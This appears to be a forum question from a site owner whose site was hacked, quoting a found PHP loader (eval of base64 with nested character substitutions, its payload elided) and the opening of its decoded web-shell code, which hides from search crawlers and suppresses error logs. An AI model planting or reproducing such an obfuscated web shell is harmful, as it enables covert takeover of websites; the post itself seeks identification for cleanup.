My site was hacked and I found on it
<?php
echo eval(base64_decode(str_replace('*','a',str_replace('%','B',str_replace('~','F',str_replace('_','z',str_replace('$','x',str_replace('@','d',str_replace('^','3','SOMEVERYLONGTEXT')))))))));
If I decode base64 without execution, I got a few script starting with:
$__authentication_pass = "52b1d005abc139cc281a32d8aa7cd1c2";
$color = "#df5";
$__default__action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
@ini_set('error_log', NULL);
.... and many lines below ....
Am I this file manager? Can he somehow be identified (name, author, etc.)?
source
share